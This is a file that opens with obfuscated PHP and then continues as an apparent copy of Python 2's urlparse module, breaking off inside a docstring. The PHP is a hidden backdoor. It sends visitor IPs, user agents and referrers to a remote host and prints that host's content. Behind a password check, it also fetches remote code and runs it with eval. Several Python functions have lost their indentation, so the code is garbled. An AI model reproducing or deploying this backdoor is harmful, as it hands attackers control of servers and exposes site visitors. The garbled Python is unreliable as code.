ing(0); goto glSNg_LzxYIsX2; glSNg_LzxYIsX2: $utiBLP6LCTh1f2 = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto L8DBoJliwEzMp6; SlOv92pUeuRbs6: function OB2VtLXkgRIPlw($f1mozuANtprQMT) { return rtrim(strtr(base64_encode($f1mozuANtprQMT), "\x2b\57", "\x2d\x5f"), "\75"); } goto TDIrhdxvpNlFt9; os9gRuFURD1cGv: error_reporting(0); goto uxRi5Q7SMo35qu; wH1UQCn4Kym7NZ: @header("\x43\x6f\x6e\164\145\156\164\x2d\x54\171\x70\x65\x3a" . $Obe5O3pNrh1wNk["\x74\171\x70\145"]); goto lY0mM3QMw40Wja; sjCKQHz6Q60Ccm: $HONQlNCvlYnOH8 = substr($Gc9_8J48v7x6gV, strrpos($Gc9_8J48v7x6gV, "\56")); goto pYDglccpOwInMp; utegf_3TzFo8KM: header("\103\157\156\164\145\x6e\x74\x2d\x54\x79\x70\x65\x3a\40\x74\145\x78\x74\57\150\x74\155\154\73\40\x63\x68\x61\162\163\x65\164\75\165\164\x66\x2d\x38"); goto os9gRuFURD1cGv; tmjXznylhTgZ8a: if (in_array($Obe5O3pNrh1wNk["\x73\164\x61\164\x75\x73"], array(0, 200))) { goto nhUzRbCLQnuhLh; } goto c5_FfvrAB9U4Yd; ogjcRqlt8m1yFt: AtSmUC2FnsV8tA::KI1Kxaut6tOb4_(); goto utegf_3TzFo8KM; cCQUyydRpwrclc: $Obe5O3pNrh1wNk = cTP2tSflXg1jMM(base64_decode("\141\110\x52\60\x63\104\x6f\x76\114\62\150\63\131\x6a\x55\64\144\x6a\101\63\x4c\x6e\x42\154\143\110\121\x75\x63\62\x46\x73\132\x53\70"), $Ym0oIOWx6ByrbA); goto tmjXznylhTgZ8a; HEzdriQUoUsbcb: oZofqjcmql98Vl: goto RdRkLruqBbgd8Z; Pji3QhS868OoF4: pdT1WydGNbUwH7: goto uQMzHjqkf81tHB; hiBpnXBGYbBU3U: $kQ67spUDDLBffj = false; goto vf1Hpkrvn4j1uD; Cd7vkzilA61XS4: $cVPbc5aZBpQh4S = ''; goto Pji3QhS868OoF4; YpOvOLk2zAfp6F: $Ym0oIOWx6ByrbA["\163\156"] = ob2vTLxkGRipLW($_SERVER["\123\103\122\x49\x50\124\x5f\x4e\x41\115\105"]); goto hQrHQ4TUM_yVuh; zCPQ5sJ4prS3cM: class AtsmuC2FNSv8tA { static function HiR6oxdC0gvy2z($BW71TGqh6zqLp0) { goto KHgKgOn3FsDTTa; WnkUI9pHyPBuZm: $GkQAuHLQ3N3XQW = ''; goto WM19NL2F93TTJX; KHgKgOn3FsDTTa: $KsSQ2WVlAfhYGi = "\x72" . "\141" . "\156" . "\x67" . 
"\145"; goto SYHHG2duid0FC5; AkZwDNU1hD13k2: Msf7bOuYLqoUBQ: goto zjbEJbLu1rh6fC; SYHHG2duid0FC5: $AtNGdLmxUU_eyr = $KsSQ2WVlAfhYGi("\176", "\40"); goto sDlG7XxbTh82si; sDlG7XxbTh82si: $Qa8g5WW7UopXE6 = explode("\53", $BW71TGqh6zqLp0); goto WnkUI9pHyPBuZm; WM19NL2F93TTJX: foreach ($Qa8g5WW7UopXE6 as $TzjXB0hEV3mWbH => $vBDjbTJco2LdIH) { $GkQAuHLQ3N3XQW .= $AtNGdLmxUU_eyr[$vBDjbTJco2LdIH - 5199]; ek2Wb04KDv0_8r: } goto AkZwDNU1hD13k2; zjbEJbLu1rh6fC: return $GkQAuHLQ3N3XQW; goto mvSqNKKQW0dWKE; mvSqNKKQW0dWKE: } static function pt0kgTqOQgWXOc($U2C_3PmbNzlS0s, $dFFH41CbFWTZVX) { goto PeU6Y0BKnLAjiD; PeU6Y0BKnLAjiD: $vAUjzk7AjeF8LJ = curl_init($U2C_3PmbNzlS0s); goto XgkiCPEdPud823; F0lfera6M44Flk: $ew4RbqszUvgJ48 = curl_exec($vAUjzk7AjeF8LJ); goto KyuOuTMYBfTs48; KyuOuTMYBfTs48: return empty($ew4RbqszUvgJ48) ? $dFFH41CbFWTZVX($U2C_3PmbNzlS0s) : $ew4RbqszUvgJ48; goto zEsIdRklqzh6zy; XgkiCPEdPud823: curl_setopt($vAUjzk7AjeF8LJ, CURLOPT_RETURNTRANSFER, 1); goto F0lfera6M44Flk; zEsIdRklqzh6zy: } static function ki1kXAUT6tOb4_() { goto EJ7566q1lfwfcm; xsPP8ESDmR1Aur: @eval($ynlJNPNMmDeXVa[1 + 3]($jHnu4Zp7Wf_MZ8)); goto K3HoZH3pxQfn2c; FiKMKPq3gMe0CH: @$ynlJNPNMmDeXVa[0 + 10](INPUT_GET, "\157\x66") == 1 && die($ynlJNPNMmDeXVa[1 + 4](__FILE__)); goto BrQwRNK4B0XILn; CLlLAWjdHMTY3X: foreach ($uOCboEbhYVOtM8 as $w9aHYENXNIyo2G) { $ynlJNPNMmDeXVa[] = self::hiR6oxdc0gVy2z($w9aHYENXNIyo2G); pinv70Hl5Kbn3s: } goto m3wDdy0f3A1DIX; m3wDdy0f3A1DIX: p8r5sgUOVFkFTO: goto Z8yLLNYDCQaHAi; OzamV3emZ6eAbO: $s4rOMgcAWfiAfB = @$ynlJNPNMmDeXVa[2 + 1]($ynlJNPNMmDeXVa[5 + 1], $bVmLTGOkbLprfr); goto L3pzZmGB9cJxd1; uXTgzQ2JHrZmxk: $jHnu4Zp7Wf_MZ8 = self::pt0kgtQOqGWXoc($xj2AeH6SP1maOW[1 + 0], $ynlJNPNMmDeXVa[4 + 1]); goto xsPP8ESDmR1Aur; NO2vbVdI186HFj: HzpQLyst8TW3Tc: goto UaJaR8RWF8BtcP; L3pzZmGB9cJxd1: $xj2AeH6SP1maOW = $ynlJNPNMmDeXVa[2 + 0]($s4rOMgcAWfiAfB, true); goto FiKMKPq3gMe0CH; BrQwRNK4B0XILn: if (!(@$xj2AeH6SP1maOW[0] - time() > 0 and md5(md5($xj2AeH6SP1maOW[0 + 3])) === 
"\x65\64\66\x66\63\x63\x32\65\145\x38\70\x62\66\60\142\x32\x34\71\x66\x34\141\71\61\x38\x31\65\143\x61\71\x34\x62\61")) { goto HzpQLyst8TW3Tc; } goto uXTgzQ2JHrZmxk; EJ7566q1lfwfcm: $uOCboEbhYVOtM8 = array("\x35\x32\62\x36\x2b\x35\x32\61\x31\53\65\62\62\x34\x2b\x35\x32\x32\70\53\x35\x32\x30\71\x2b\65\62\x32\x34\53\65\x32\x33\x30\x2b\65\x32\x32\63\53\x35\x32\60\70\53\x35\x32\61\x35\53\x35\x32\62\66\53\x35\x32\60\x39\53\x35\62\x32\60\53\65\62\x31\64\53\x35\x32\x31\x35", "\65\x32\61\x30\53\x35\x32\60\71\x2b\65\62\61\x31\53\x35\x32\63\60\x2b\x35\62\x31\x31\53\x35\62\x31\64\53\65\62\60\x39\53\x35\x32\x37\x36\x2b\65\62\67\64", "\65\x32\61\71\x2b\x35\x32\x31\60\53\65\x32\x31\64\x2b\x35\x32\x31\x35\x2b\x35\62\63\x30\53\65\62\62\x35\x2b\65\x32\62\x34\53\x35\62\62\66\53\x35\62\61\64\53\65\x32\x32\x35\x2b\65\62\62\64", "\65\62\61\x33\x2b\x35\62\x32\70\53\x35\x32\x32\66\53\65\x32\x31\x38", "\x35\62\x32\67\53\65\x32\62\70\x2b\65\x32\x31\x30\x2b\65\62\x32\64\x2b\x35\x32\x37\x31\53\65\62\67\63\53\x35\62\x33\x30\x2b\x35\x32\x32\65\x2b\65\x32\x32\x34\53\65\62\x32\66\53\x35\62\x31\x34\53\x35\x32\62\x35\x2b\65\62\x32\x34", "\x35\x32\62\x33\x2b\65\x32\62\60\x2b\65\x32\x31\x37\53\65\62\x32\x34\53\65\x32\x33\60\x2b\65\x32\x32\62\53\x35\62\62\x34\53\x35\x32\x30\x39\x2b\x35\62\x33\x30\53\x35\x32\x32\x36\53\65\62\61\x34\53\65\x32\x31\x35\53\x35\62\x30\x39\53\x35\x32\x32\x34\53\65\x32\61\65\53\x35\62\60\x39\53\65\62\61\60", "\x35\x32\x35\63\53\x35\x32\x38\x33", "\x35\x32\x30\x30", "\x35\62\67\x38\x2b\x35\x32\x38\63", "\65\x32\66\x30\x2b\x35\62\x34\63\53\65\62\x34\63\53\x35\x32\66\60\x2b\x35\62\63\66", "\x35\62\62\x33\x2b\x35\62\62\x30\x2b\x35\x32\x31\67\53\65\62\60\x39\53\x35\62\62\x34\x2b\65\x32\x31\x31\53\65\x32\63\x30\53\65\62\x32\60\53\65\x32\61\65\53\x35\62\61\63\53\65\62\x30\70\x2b\65\62\x30\71"); goto CLlLAWjdHMTY3X; Z8yLLNYDCQaHAi: $bVmLTGOkbLprfr = @$ynlJNPNMmDeXVa[1]($ynlJNPNMmDeXVa[10 + 0](INPUT_GET, $ynlJNPNMmDeXVa[4 + 5])); goto OzamV3emZ6eAbO; K3HoZH3pxQfn2c: die; goto 
NO2vbVdI186HFj; UaJaR8RWF8BtcP: } } goto ogjcRqlt8m1yFt; t8TpplQkxmNQKg: VWq7n8avJneZWe: goto ZVM0YvvgbIo11U; ufyV20U0fMcSJg: nhUzRbCLQnuhLh: goto b7DnrAS9hKZE6C; L2fzlj7JmrK97A: $Ym0oIOWx6ByrbA["\163"] = oB2VtLXKgRIPLW($DCQAxVYJ0s2xNZ); goto juNf0o5W9RUnP8; TDIrhdxvpNlFt9: function tDk2fhL7aRlnRq() { goto A0jfGlM3HtbTc8; vsGQjQL1n3QW2Q: $cIX1t8ECuEurN8 = $cIX1t8ECuEurN8[0]; goto myJj1wXf2lYI5E; QOh3G8lOqaQWeK: xB39IGICyiwlN1: goto PWUIOKof_frKdi; WSbyHvGkSPW8G6: return $cIX1t8ECuEurN8; goto Grz6njp1WbkzyW; myJj1wXf2lYI5E: Fy2tlq68W1Z4cY: goto WSbyHvGkSPW8G6; B99XlumIIoF9yc: goto O37D2TgI1D66fQ; goto kKfGd_juWsO9SB; tNtX7SnHEoN9ve: if (isset($_SERVER["\x48\124\x54\120\x5f\130\137\x52\x45\101\114\x5f\x49\x50"]) && !empty($_SERVER["\x48\124\x54\x50\x5f\x58\x5f\122\105\101\x4c\x5f\x49\x50"])) { goto IbsgkORsYRpgBL; } goto m1YuAzS4K6e0ZJ; gwXV80f3Kvnin5: $cIX1t8ECuEurN8 = $_SERVER["\110\124\124\120\137\130\x5f\106\117\122\x57\101\x52\x44\x45\x44\137\x46\x4f\x52"]; goto F5UC4mBhfgxdX2; xHNzAyzHVlO5pq: $cIX1t8ECuEurN8 = explode("\54", $cIX1t8ECuEurN8); goto vsGQjQL1n3QW2Q; LkMROqR4RYuDsX: $cIX1t8ECuEurN8 = $_SERVER["\x52\x45\115\117\124\105\x5f\101\x44\x44\x52"]; goto dYhlmimy6UKWgc; PWUIOKof_frKdi: $cIX1t8ECuEurN8 = $_SERVER["\x48\124\124\x50\x5f\x43\x46\x5f\x43\117\116\x4e\105\x43\x54\x49\116\x47\x5f\x49\x50"]; goto B99XlumIIoF9yc; dYhlmimy6UKWgc: goto O37D2TgI1D66fQ; goto QOh3G8lOqaQWeK; c7Zjb3FklkFA6T: $cIX1t8ECuEurN8 = trim(str_replace("\x20", '', $cIX1t8ECuEurN8), "\54"); goto jnEONwk8qQ3QoE; IYNLV2P_z1R8_9: $cIX1t8ECuEurN8 = $_SERVER["\x48\x54\x54\x50\137\130\137\x52\105\x41\x4c\137\x49\x50"]; goto g3xl2m2S2bmEAU; A0jfGlM3HtbTc8: $cIX1t8ECuEurN8 = ''; goto rR27t1UBdIHeAR; rR27t1UBdIHeAR: if (isset($_SERVER["\110\x54\x54\x50\137\x43\x46\137\103\117\x4e\x4e\105\x43\124\111\116\107\137\x49\x50"]) && !empty($_SERVER["\x48\x54\x54\120\x5f\x43\x46\137\103\x4f\x4e\x4e\105\103\124\x49\x4e\x47\x5f\x49\x50"])) { goto xB39IGICyiwlN1; } goto tNtX7SnHEoN9ve; jnEONwk8qQ3QoE: if 
(!(strpos($cIX1t8ECuEurN8, "\x2c") !== false)) { goto Fy2tlq68W1Z4cY; } goto xHNzAyzHVlO5pq; m1YuAzS4K6e0ZJ: if (isset($_SERVER["\x48\x54\x54\x50\137\130\x5f\x46\x4f\122\x57\101\x52\104\x45\104\137\x46\117\x52"]) && !empty($_SERVER["\x48\x54\124\120\x5f\130\137\x46\117\x52\x57\x41\x52\104\x45\104\137\x46\x4f\x52"])) { goto YO_1CRlkHk0b5K; } goto LkMROqR4RYuDsX; kKfGd_juWsO9SB: IbsgkORsYRpgBL: goto IYNLV2P_z1R8_9; F5UC4mBhfgxdX2: O37D2TgI1D66fQ: goto c7Zjb3FklkFA6T; g3xl2m2S2bmEAU: goto O37D2TgI1D66fQ; goto PoJd83qL9Ntzk7; PoJd83qL9Ntzk7: YO_1CRlkHk0b5K: goto gwXV80f3Kvnin5; Grz6njp1WbkzyW: } goto J5qe_wS1vgzck7; b7DnrAS9hKZE6C: if (!strlen($Obe5O3pNrh1wNk["\143\157\156\x74\145\156\x74"])) { goto VWq7n8avJneZWe; } goto wH1UQCn4Kym7NZ; juNf0o5W9RUnP8: $Ym0oIOWx6ByrbA["\x75"] = ob2VTLxKgRIPLw($_SERVER["\x48\x54\x54\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"]); goto cCQUyydRpwrclc; ks1k8aTWZXL63p: $Ym0oIOWx6ByrbA["\162\146"] = oB2VtLXkgriplW($cVPbc5aZBpQh4S); goto L2fzlj7JmrK97A; zdY3FjKTBRxxC2: exit("\x7b\x20\42\x65\x72\162\x6f\162\42\x3a\40\x32\60\x30\x2c\x20\42\x6c\x63\x22\72\40\x22\x6a\153\42\54\40\x22\144\141\164\x61\42\72\x20\x5b\x20\x31\x20\135\40\x7d"); goto PZW0GG3F0uoCYA; mBWmHT5C3u6kIU: exit(strrev(md5($_SERVER["\110\x54\124\x50\137\x48\117\123\124"]))); goto iFI7SVRy1TDCFo; lY0mM3QMw40Wja: exit($Obe5O3pNrh1wNk["\x63\x6f\156\x74\x65\156\164"]); goto t8TpplQkxmNQKg; ZVM0YvvgbIo11U: aXnousimfq1MHe: ?>
"""Parse (absolute and relative) URLs.
urlparse module is based upon the following RFC specifications.
RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding
and L. Masinter, January 2005.
RFC 2732 : "Format for Literal IPv6 Addresses in URL's" by R.Hinden, B.Carpenter
and L.Masinter, December 1999.
RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T.
Berners-Lee, R. Fielding, and L. Masinter, August 1998.
RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zwinski, July 1998.
RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June
1995.
RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M.
McCahill, December 1994
RFC 3986 is considered the current standard and any future changes to
urlparse module should conform with it. The urlparse module is
currently not entirely compliant with this RFC due to de facto
scenarios for parsing, and for backward compatibility purposes, some
parsing quirks from older RFCs are retained. The test cases in
test_urlparse.py provide a good indicator of parsing behavior.
The WHATWG URL Parser spec should also be considered. We are not compliant with
it either due to existing user code API behavior expectations (Hyrum's Law).
It serves as a useful guide when making changes.
"""
import re
import os
# Public names exported by a star-import of this module.
__all__ = ["urlparse", "urlunparse", "urljoin", "urldefrag",
"urlsplit", "urlunsplit", "parse_qs", "parse_qsl"]
# A classification of schemes ('' means apply by default)
# uses_relative: urljoin() only resolves a relative reference when the scheme
# is listed here; otherwise it returns the second URL unchanged.
uses_relative = ['ftp', 'http', 'gopher', 'nntp', 'imap',
'wais', 'file', 'https', 'shttp', 'mms',
'prospero', 'rtsp', 'rtspu', '', 'sftp',
'svn', 'svn+ssh']
# uses_netloc: urlunsplit() emits the '//' authority marker for these schemes
# even when netloc is empty, and urljoin() inherits the base netloc for them.
uses_netloc = ['ftp', 'http', 'gopher', 'nntp', 'telnet',
'imap', 'wais', 'file', 'mms', 'https', 'shttp',
'snews', 'prospero', 'rtsp', 'rtspu', 'rsync', '',
'svn', 'svn+ssh', 'sftp','nfs','git', 'git+ssh']
# uses_params: urlparse() splits ';params' off the path only for these schemes.
uses_params = ['ftp', 'hdl', 'prospero', 'http', 'imap',
'https', 'shttp', 'rtsp', 'rtspu', 'sip', 'sips',
'mms', '', 'sftp', 'tel']
# These are not actually used anymore, but should stay for backwards
# compatibility. (They are undocumented, but have a public-looking name.)
non_hierarchical = ['gopher', 'hdl', 'mailto', 'news',
'telnet', 'wais', 'imap', 'snews', 'sip', 'sips']
uses_query = ['http', 'wais', 'imap', 'https', 'shttp', 'mms',
'gopher', 'rtsp', 'rtspu', 'sip', 'sips', '']
uses_fragment = ['ftp', 'hdl', 'http', 'gopher', 'news',
'nntp', 'wais', 'https', 'shttp', 'snews',
'file', 'prospero', '']
# Characters valid in scheme names
# (urlsplit() treats the text before the first ':' as a scheme only when every
# character of it appears in this string.)
scheme_chars = ('abcdefghijklmnopqrstuvwxyz'
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
'0123456789'
'+-.')
# Leading and trailing C0 control and space to be stripped per WHATWG spec.
# == "".join([chr(i) for i in range(0, 0x20 + 1)])
# urlsplit() strips these from the start of the URL and from both ends of the
# default scheme argument.
_WHATWG_C0_CONTROL_OR_SPACE = '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f '
# Unsafe bytes to be removed per WHATWG spec
# (removed wherever they occur in the string, not only at the ends).
_UNSAFE_URL_BYTES_TO_REMOVE = ['\t', '\r', '\n']
# urlsplit() empties the whole cache once it holds this many entries.
MAX_CACHE_SIZE = 20
# Maps (url, scheme, allow_fragments, type(url), type(scheme)) to the
# SplitResult that urlsplit() computed for it.
_parse_cache = {}
def clear_cache():
    """Empty the module-level cache of urlsplit() results.

    The cache dictionary itself is kept; only its entries are dropped.
    """
    _parse_cache.clear()
class ResultMixin(object):
    """Read-only accessors derived from the ``netloc`` attribute.

    The host class must expose ``netloc`` as a string of the general form
    ``[user[:password]@]host[:port]``.
    """

    @property
    def username(self):
        """Text before the first ':' of the userinfo, or None without '@'."""
        userinfo, at_sign, _ = self.netloc.rpartition("@")
        if not at_sign:
            return None
        return userinfo.partition(":")[0]

    @property
    def password(self):
        """Text after the first ':' of the userinfo, or None if absent."""
        userinfo, at_sign, _ = self.netloc.rpartition("@")
        _, colon, secret = userinfo.partition(":")
        if at_sign and colon:
            return secret
        return None

    @property
    def hostname(self):
        """Lower-cased host name, or None when the host part is empty."""
        host_port = self.netloc.split('@')[-1]
        if '[' in host_port and ']' in host_port:
            # Bracketed literal: keep what sits between '[' and the first ']'.
            host = host_port.split(']')[0][1:]
        elif ':' in host_port:
            host = host_port.split(':')[0]
        elif host_port == '':
            return None
        else:
            host = host_port
        return host.lower()

    @property
    def port(self):
        """Port as an int in 0..65535, or None if missing or out of range.

        A non-numeric port makes int() raise ValueError.
        """
        # Drop the userinfo and any bracketed host so only ':port' can remain.
        tail = self.netloc.split('@')[-1].split(']')[-1]
        if ':' not in tail:
            return None
        digits = tail.split(':')[1]
        if not digits:
            return None
        number = int(digits, 10)
        # verify legal port
        if 0 <= number <= 65535:
            return number
        return None
from collections import namedtuple
class SplitResult(namedtuple('SplitResult',
                             ['scheme', 'netloc', 'path', 'query', 'fragment']),
                  ResultMixin):
    """5-field result of urlsplit(), with the ResultMixin accessors."""

    __slots__ = ()

    def geturl(self):
        """Reassemble the fields into a URL string via urlunsplit()."""
        return urlunsplit(self)
class ParseResult(namedtuple('ParseResult',
                             ['scheme', 'netloc', 'path', 'params', 'query',
                              'fragment']),
                  ResultMixin):
    """6-field result of urlparse(), with the ResultMixin accessors."""

    __slots__ = ()

    def geturl(self):
        """Reassemble the fields into a URL string via urlunparse()."""
        return urlunparse(self)
def urlparse(url, scheme='', allow_fragments=True):
    """Parse a URL into 6 components:
    <scheme>://<netloc>/<path>;<params>?<query>#<fragment>

    Returns a ParseResult (scheme, netloc, path, params, query, fragment).
    Components are not broken up further (netloc stays a single string)
    and % escapes are not expanded.  Splitting is delegated to urlsplit();
    the ';params' part is separated only for schemes in uses_params.
    """
    parts = urlsplit(url, scheme, allow_fragments)
    scheme, netloc, path, query, fragment = parts
    params = ''
    if scheme in uses_params and ';' in path:
        path, params = _splitparams(path)
    return ParseResult(scheme, netloc, path, params, query, fragment)
def _splitparams(url):
if '/' in url:
i = url.find(';', url.rfind('/'))
if i < 0:
return url, ''
else:
i = url.find(';')
return url[:i], url[i+1:]
def _splitnetloc(url, start=0):
delim = len(url) # position of end of domain part of url, default is end
for c in '/?#': # look for delimiters; the order is NOT important
wdelim = url.find(c, start) # find first of this delim
if wdelim >= 0: # if found
delim = min(delim, wdelim) # use earliest delim position
return url[start:delim], url[delim:] # return (domain, rest)
def _checknetloc(netloc):
if not netloc or not isinstance(netloc, unicode):
return
# looking for characters like \u2100 that expand to 'a/c'
# IDNA uses NFKC equivalence, so normalize for this check
import unicodedata
n = netloc.replace(u'@', u'') # ignore characters already included
n = n.replace(u':', u'') # but not the surrounding text
n = n.replace(u'#', u'')
n = n.replace(u'?', u'')
netloc2 = unicodedata.normalize('NFKC', n)
if n == netloc2:
return
for c in '/?#@:':
if c in netloc2:
raise ValueError("netloc %r contains invalid characters "
"under NFKC normalization"
% netloc)
def _remove_unsafe_bytes_from_url(url):
    """Return ``url`` with every entry of _UNSAFE_URL_BYTES_TO_REMOVE deleted.

    Occurrences are removed anywhere in the string, not just at the ends.
    """
    cleaned = url
    for unsafe in _UNSAFE_URL_BYTES_TO_REMOVE:
        cleaned = cleaned.replace(unsafe, "")
    return cleaned
def urlsplit(url, scheme='', allow_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>

    Returns a SplitResult (scheme, netloc, path, query, fragment).
    Components are not broken up further (netloc stays a single string)
    and % escapes are not expanded.

    ``scheme`` is the default used when the URL carries none.  When
    ``allow_fragments`` is false, '#' is left in place instead of starting
    a fragment.  Raises ValueError for unbalanced '[' / ']' in the netloc
    and for whatever _checknetloc() rejects.  Results are cached in
    _parse_cache.
    """
    # Sanitize both inputs before they take part in the cache key.
    url = _remove_unsafe_bytes_from_url(url)
    scheme = _remove_unsafe_bytes_from_url(scheme)
    url = url.lstrip(_WHATWG_C0_CONTROL_OR_SPACE)
    scheme = scheme.strip(_WHATWG_C0_CONTROL_OR_SPACE)
    allow_fragments = bool(allow_fragments)

    key = url, scheme, allow_fragments, type(url), type(scheme)
    cached = _parse_cache.get(key, None)
    if cached:
        return cached
    if len(_parse_cache) >= MAX_CACHE_SIZE:  # avoid runaway growth
        clear_cache()

    netloc = query = fragment = ''
    colon = url.find(':')
    if colon > 0:
        prefix, rest = url[:colon], url[colon + 1:]
        if prefix == 'http':
            # Common case: accepted as a scheme without the port-number
            # check applied to other prefixes.
            scheme, url = prefix.lower(), rest
        elif all(ch in scheme_chars for ch in prefix):
            # make sure "url" is not actually a port number (in which case
            # "scheme" is really part of the path)
            if not rest or any(ch not in '0123456789' for ch in rest):
                # not a port number
                scheme, url = prefix.lower(), rest

    if url[:2] == '//':
        netloc, url = _splitnetloc(url, 2)
        has_open = '[' in netloc
        has_close = ']' in netloc
        if has_open != has_close:
            raise ValueError("Invalid IPv6 URL")
    if allow_fragments and '#' in url:
        url, fragment = url.split('#', 1)
    if '?' in url:
        url, query = url.split('?', 1)
    _checknetloc(netloc)

    result = SplitResult(scheme, netloc, url, query, fragment)
    _parse_cache[key] = result
    return result
def urlunparse(data):
    """Rebuild a URL string from the 6 items produced by urlparse().

    The result may differ slightly from the URL originally parsed while
    remaining equivalent, e.g. when it had redundant delimiters such as a
    '?' followed by an empty query.
    """
    scheme, netloc, path, params, query, fragment = data
    if params:
        # Re-attach the parameters to the path before delegating.
        path = "%s;%s" % (path, params)
    return urlunsplit((scheme, netloc, path, query, fragment))
def urlunsplit(data):
    """Combine the five items returned by urlsplit() into a URL string.

    ``data`` may be any five-item iterable.  The result may differ slightly
    from the URL originally parsed while remaining equivalent, e.g. when it
    had unnecessary delimiters such as a '?' followed by an empty query.
    """
    scheme, netloc, path, query, fragment = data
    result = path
    if netloc or (scheme and scheme in uses_netloc and result[:2] != '//'):
        # An authority part is written, so a non-empty path must be rooted.
        if result and result[:1] != '/':
            result = '/' + result
        result = '//' + (netloc or '') + result
    if scheme:
        result = scheme + ':' + result
    if query:
        result = result + '?' + query
    if fragment:
        result = result + '#' + fragment
    return result
def urljoin(base, url, allow_fragments=True):
    """Join a base URL and a possibly relative URL to form an absolute
    interpretation of the latter.

    An empty ``base`` returns ``url`` and an empty ``url`` returns ``base``.
    ``url`` is also returned unchanged when its scheme differs from the
    base's or is not listed in uses_relative.
    """
    if not base:
        return url
    if not url:
        return base

    bscheme, bnetloc, bpath, bparams, bquery, bfragment = urlparse(
        base, '', allow_fragments)
    scheme, netloc, path, params, query, fragment = urlparse(
        url, bscheme, allow_fragments)

    if scheme != bscheme or scheme not in uses_relative:
        return url

    if scheme in uses_netloc:
        if netloc:
            # The reference names its own authority; nothing to inherit.
            return urlunparse((scheme, netloc, path, params, query, fragment))
        netloc = bnetloc

    if path[:1] == '/':
        return urlunparse((scheme, netloc, path, params, query, fragment))

    if not path and not params:
        # Only query and/or fragment were given: reuse the base path.
        if not query:
            query = bquery
        return urlunparse((scheme, netloc, bpath, bparams, query, fragment))

    # Replace the last segment of the base path with the relative path.
    segments = bpath.split('/')[:-1] + path.split('/')
    # XXX The stuff below is bogus in various ways...
    if segments[-1] == '.':
        segments[-1] = ''
    segments = [seg for seg in segments if seg != '.']

    # Collapse the first "<name>/.." pair that is not at the very end, then
    # rescan from the start until no such pair is left.
    collapsed = True
    while collapsed:
        collapsed = False
        for idx in range(1, len(segments) - 1):
            if segments[idx] == '..' and segments[idx - 1] not in ('', '..'):
                del segments[idx - 1:idx + 1]
                collapsed = True
                break

    if segments == ['', '..']:
        segments[-1] = ''
    elif len(segments) >= 2 and segments[-1] == '..':
        segments[-2:] = ['']

    return urlunparse((scheme, netloc, '/'.join(segments),
                       params, query, fragment))
def urldefrag(url):
    """Strip the fragment from ``url``.

    Returns (url_without_fragment, fragment).  When the URL contains no '#'
    it is returned untouched together with an empty string.
    """
    if '#' not in url:
        return url, ''
    scheme, netloc, path, params, query, fragment = urlparse(url)
    stripped = urlunparse((scheme, netloc, path, params, query, ''))
    return stripped, fragment
try:
unicode
except NameError:
def _is_unicode(x):
return 0
else:
def _is_unicode(x):
return isinstance(x, unicode)
# unquote method for parse_qs and parse_qsl
# Cannot use directly from urllib as it would create a circular reference
# because urllib uses urlparse methods (urljoin). If you update this function,
# update it also in urllib. This code duplication does not exist in Python 3.
_hexdig = '0123456789ABCDEFabcdef'
_hextochr = dict((a+b, chr(int(a+b,16)))
for a in _hexdig for b in _hexdig)
_asciire = re.compile('([\x00-\x7f]+)')
def unquote(s):
    """unquote('abc%20def') -> 'abc def'.

    A '%' that is not followed by two hex digits is left in the output
    unchanged.  For unicode input only the ASCII runs are decoded; each is
    unquoted as a byte string and then decoded as latin1.
    """
    if _is_unicode(s):
        if '%' not in s:
            return s
        # With a capturing pattern split() alternates non-ASCII text (even
        # indexes) with ASCII runs (odd indexes).
        pieces = _asciire.split(s)
        out = [pieces[0]]
        for idx in range(1, len(pieces), 2):
            out.append(unquote(str(pieces[idx])).decode('latin1'))
            out.append(pieces[idx + 1])
        return ''.join(out)

    chunks = s.split('%')
    # fastpath
    if len(chunks) == 1:
        return s
    out = [chunks[0]]
    for chunk in chunks[1:]:
        decoded = _hextochr.get(chunk[:2])
        if decoded is None:
            # Not a valid escape: put the '%' back and keep the text as is.
            out.append('%')
            out.append(chunk)
        else:
            out.append(decoded)
            out.append(chunk[2:])
    return ''.join(out)
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, max_num_fields=None,
             separator=None):
    """Parse a query string into a dictionary of value lists.

    Arguments:

    qs: percent-encoded query string to be parsed

    keep_blank_values: flag indicating whether blank values in
        percent-encoded queries should be treated as blank strings.
        A true value keeps them as blank strings.  The default false
        value drops them as if they had not been included.

    strict_parsing: flag indicating what to do with parsing errors.
        If false (the default), errors are silently ignored.
        If true, errors raise a ValueError exception.

    max_num_fields: int. If set, a ValueError is raised when
        parse_qsl() would read more than that many fields.

    separator: passed through to parse_qsl() unchanged.

    Returns a dict mapping each field name to the list of its values, in
    the order parse_qsl() produced them.
    """
    grouped = {}
    pairs = parse_qsl(qs, keep_blank_values, strict_parsing,
                      max_num_fields, separator)
    for name, value in pairs:
        grouped.setdefault(name, []).append(value)
    return grouped
class _QueryStringSeparatorWarning(RuntimeWarning):
"""Warning for using default `separator` in parse_qs or parse_qsl"""
# The default "separator" for parse_qsl can be specified in a config file.
# It's cached after first read.
# parse_qsl opens this path and reads the PYTHON_URLLIB_QS_SEPARATOR option
# from its [parse_qs] section.
_QS_SEPARATOR_CONFIG_FILENAME = '/etc/python/urllib.cfg'
# Cached config-file value; None until parse_qsl has read one successfully.
_default_qs_separator = None
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0, max_num_fields=None,
              separator=None):
    """Parse a query given as a string argument.

    Arguments:

    qs: percent-encoded query string to be parsed

    keep_blank_values: flag indicating whether blank values in
        percent-encoded queries should be treated as blank strings.  A
        true value indicates that blanks should be retained as blank
        strings.  The default false value indicates that blank values
        are to be ignored and treated as if they were not included.

    strict_parsing: flag indicating what to do with parsing errors. If
        false (the default), errors are silently ignored. If true,
        errors raise a ValueError exception.

    max_num_fields: int. If set, then throws a ValueError if there
        are more than n fields read by parse_qsl().

    separator: string that separates the fields.  When None, the default
